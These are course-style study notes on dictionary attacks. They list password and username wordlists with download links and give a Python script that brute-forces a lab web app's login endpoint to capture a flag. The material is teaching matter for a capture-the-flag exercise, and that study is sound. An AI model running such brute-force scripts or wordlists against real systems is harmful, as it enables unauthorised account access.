3 - Dictionary Attacks

# Introduction - The effectiveness of a dictionary attack lies in its ability to exploit the human tendency to prioritize memorable passwords over secure ones - Despite repeated warnings, many individuals continue to opt for passwords based on readily available information such as dictionary words, common phrases, names, or easily guessable patterns - Predictability makes common words and phrases vulnerable to dictionary attacks, where attackers systematically test a pre-defined list of potential passwords against the target system # Building and Using Wordlists |Wordlist|Description|Typical Use|Source| |---|---|---|---| |`rockyou.txt`|A popular password wordlist containing millions of passwords leaked from the RockYou breach.|Commonly used for password brute force attacks.|[RockYou breach dataset](https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt)| |`top-usernames-shortlist.txt`|A concise list of the most common usernames.|Suitable for quick brute force username attempts.|[SecLists](https://github.com/danielmiessler/SecLists/blob/master/Usernames/top-usernames-shortlist.txt)| |`xato-net-10-million-usernames.txt`|A more extensive list of 10 million usernames.|Used for thorough username brute forcing.|[SecLists](https://github.com/danielmiessler/SecLists/blob/master/Usernames/xato-net-10-million-usernames.txt)| |`2023-200_most_used_passwords.txt`|A list of the 200 most commonly used passwords as of 2023.|Effective for targeting commonly reused passwords.|[SecLists](https://github.com/danielmiessler/SecLists/blob/master/Passwords/Common-Credentials/2023-200_most_used_passwords.txt)| |`Default-Credentials/default-passwords.txt`|A list of default usernames and passwords commonly used in routers, software, and other devices.|Ideal for trying default credentials.|[SecLists](https://github.com/danielmiessler/SecLists/blob/master/Passwords/Default-Credentials/default-passwords.txt)| - For example, imagine a web app creates a route (`/dictionary`) that handles POST requests - The web app expects a `password` parameter in the request's form data - Upon receiving a request, it compares the submitted password against the expected value - If there's a match, it responds with a JSON object containing a success message and the flag - Otherwise, it returns an error message with a 401 status code (Unauthorized) ```python # dictionary-solver.py import requests ip = "127.0.0.1" # Change this to your instance IP address port = 1234 # Change this to your instance port number # Download a list of common passwords from the web and split it into lines passwords = requests.get("https://raw.githubusercontent.com/danielmiessler/SecLists/refs/heads/master/Passwords/Common-Credentials/500-worst-passwords.txt").text.splitlines() # Try each password from the list for password in passwords: print(f"Attempted password: {password}") # Send a POST request to the server with the password response = requests.post(f"http://{ip}:{port}/dictionary", data={'password': password}) # Check if the server responds with success and contains the 'flag' if response.ok and 'flag' in response.json(): print(f"Correct password found: {password}") print(f"Flag: {response.json()['flag']}") break ``` ![[images/Pasted image 20251117201751.png]]